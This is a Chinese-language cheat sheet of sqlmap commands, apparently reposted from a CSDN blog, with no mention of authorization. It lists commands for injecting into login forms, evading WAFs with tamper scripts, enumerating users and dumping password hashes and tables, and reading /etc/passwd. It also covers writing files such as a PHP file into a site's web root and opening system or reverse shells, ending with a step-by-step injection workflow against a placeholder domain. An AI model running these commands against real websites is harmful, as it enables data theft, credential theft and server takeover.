sqlmap--查看 · 個人筆記

POST登錄框注入： sqlmap.py -r 從文件讀取數據 -p 指定的參數 --tables sqlmap.py -u 登錄的地址 --forms 自動判斷注入 sqlmap.py -u 登錄的地址 --data "指定參數" 繞過waf防火墻：sqlmap.py -u 注入點 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py -u #注入點 -g 谷歌搜索 -f #指紋判別數據庫類型 -b #獲取數據庫版本信息 -p #指定可測試的參數(?page=1&id=2 -p “page,id”) -D “” #指定數據庫名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入過程到一個文件,還可中斷，下次恢復在注入(保存：-s “xx.log”　　恢復:-s “xx.log” –resume) –columns #列出字段 –current-user #獲取當前用戶名稱 –current-db #獲取當前數據庫名稱 –users #列數據庫所有用戶 –passwords #數據庫用戶所有密碼 –privileges #查看用戶權限(–privileges -U root) -U #指定數據庫用戶 –dbs #列出所有數據庫 –tables -D “” #列出指定數據庫中的表 –columns -T “user” -D “mysql” #列出mysql數據庫中的user表的所有字段 –dump-all #列出所有數據庫所有表 –exclude-sysdbs #只列出用戶自己新建的數據庫和表 –dump -T “” -D “” -C “” #列出指定數據庫的表的字段的數據(–dump -T users -D master -C surname) –dump -T “” -D “” –start 2 –top 4 # 列出指定數據庫的表的2-4字段的數據 –dbms #指定數據庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) –os #指定系統(Linux,Windows) --sql -shell 寫shell --delay 延遲的時間 --safe-freq 次數 -v #詳細的等級(0-6)： 0：只顯示Python的回溯，錯誤和關鍵消息。 1：顯示信息和警告消息。 2：顯示調試消息。 3：有效載荷注入。 4：顯示HTTP請求。 5：顯示HTTP響應頭。 6：顯示HTTP響應頁面的內容 –privileges #查看權限 –is-dba #是否是數據庫管理員 –roles #枚舉數據庫用戶角色 –udf-inject #導入用戶自定義函數（獲取系統權限） –union-check #是否支持union 注入 –union-cols #union 查詢表記錄 –union-test #union 語句測試 –union-use #采用union 注入 –union-tech orderby #union配合order by –method “POST” –data “” #POST方式提交數據(–method “POST” –data “page=1&id=2″) –cookie “用;號分開” #cookie注入(–cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”) –referer “” #使用referer欺騙(–referer “http://www.baidu.com”) –user-agent “” #自定義user-agent –proxy “http://127.0.0.1:8118″ #代理注入 –string “” #指定關鍵詞 –threads 　　 #采用多線程(–threads 3) –sql-shell #執行指定sql命令 –sql-query #執行指定的sql語句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ ) –file-read #讀取指定文件 –file-write #寫入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;將本地的test.txt文件寫入到目標的1.txt) –file-dest #要寫入的文件絕對路徑 –os-cmd=id #執行系統命令 –os-shell #系統交互shell –os-pwn #反彈shell(–os-pwn –msf-path=/opt/framework/msf3/) –msf-path= #matesploit絕對路徑(–msf-path=/opt/framework/msf3/) –os-smbrelay # –os-bof # –reg-read #讀取win系統注冊表 –priv-esc # –time-sec= #延遲設置默認–time-sec=5 為5秒 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)” #指定user-agent注入 –eta #盲注 /pentest/database/sqlmap/txt/ common-columns.txt　　字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agents.txt wordlist.txt Sqlmap常用命令： 1)判斷當前用戶是否是dba python sqlmap.py -u "url" --is-dba -v 1 2)--users:列出數據庫管理系統用戶 python sqlmap.py -u "url" --users -v 0 3)--passwords:數據庫用戶密碼(hash) python sqlmap.py -u "url" --passwords -v 0 python sqlmap.py -u "url" --passwords -U sa -v 0 4)查看用戶權限 python sqlmap.py -u "url" --privileges -v 0 python sqlmap.py -u "url" --privileges -U postgres -v 0 5)--dbs可以利用的數據庫 python sqlmap.py -u "url" --dbs -v 0 6)--tables列數據庫表 python sqlmap.py -u "url" --tables -D "information_scheam" -D：指定數據庫名 7)--columns 列出表中的列名 python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1 -T:指定表名，-D:指定庫名 8)--dump列表中指定列的內容 python sqlmap.py -u "url" --dump -T "users" -D "testdb" -C:可以指定字段指定列的范圍為2到4 python sqlmap.py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0 9)--dumap-all列出所有數據庫，所有表內容 python sqlmap.py -u "url" --dump-all -v 0 只列出用戶自己新建的數據庫和表的內容 python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0 10)--file讀取文件內容[load_file()函數] python sqlmap.py -u "url" --file /etc/password 11)執行SQL python sqlmap.py -u "url" --sql-shell 12)-p 指定參數 python sqlmap.py -u "url" -v 1 -p "id" -p可以指定多參數-p "cat,id" 13)POST提交 python sqlmap.py -u "url" --method POST --data "id=1" 14)COOKIE提交 python sqlmap.py -u "url" --cookie "id=1" -v 1 cookie值可以由TamperData抓取 15)refer欺騙 python sqlmap.py -u "url" --refer "url" -v 3 16)使用自定義user-agent或者user-agents.txt python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3 python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt" 17)使用多線程猜解 python sqlmap.py -u "url" -v 1 --current-user --threads 3 18)指定數據庫，繞過SQLMAP的自動檢測 python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL" 19)指定操作系統繞過SQLMAP自動檢測 python sqlmap.py -u "url" -v 2 --os "Windows" 20)--prefix and --postfix自定義payload python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test" 21)union注入測試 python sqlmap.py -u "url" --union-test -v -1 22)配合order by python sqlmap.py -u "url" --union-test --union-tech orderby -v 1 23)python sqlmap.py -u "url" -v 1 --union-use --banner 24)python sqlmap.py -u "url" -v 5 --union-use --current-user 25)python sqlmap.py -u "url" -v 1 --union-use --dbs 簡單的注入流程 1.讀取數據庫版本，當前用戶，當前數據庫 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 -f -b –current-user –current-db -v 1 2.判斷當前數據庫用戶權限 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –privileges -U 用戶名 -v 1 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –is-dba -U 用戶名 -v 1 3.讀取所有數據庫用戶或指定數據庫用戶的密碼 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –users –passwords -v 2 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –passwords -U root -v 2 4.獲取所有數據庫 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –dbs -v 2 5.獲取指定數據庫中的所有表 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –tables -D mysql -v 2 6.獲取指定數據庫名中指定表的字段 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –columns -D mysql -T users -v 2 7.獲取指定數據庫名中指定表中指定字段的數據 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –dump -D mysql -T users -C “username,password” -s “sqlnmapdb.log” -v 2 8.file-read讀取web文件 sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –file-read “/etc/passwd” -v 2 9.file-write寫入文件到web sqlmap -u http://www.xxxxxx.com/ test.php?p=2 –file-write /localhost/mm.php –file-dest 將本地的test.txt寫入到站點服務器的html目錄下 sqlmap.py -u "http://www.xxxxxx.com/sql-injection.php?id=1" –file-write /test/test.txt –file-dest /var/www/html/1.txt ———————————————— 版權聲明：本文為CSDN博主「lf794536440」的原創文章，遵循 CC 4.0 BY-SA 版權協議，轉載請附上原文出處鏈接及本聲明。原文鏈接：https://blog.csdn.net/lf794536440/article/details/79076281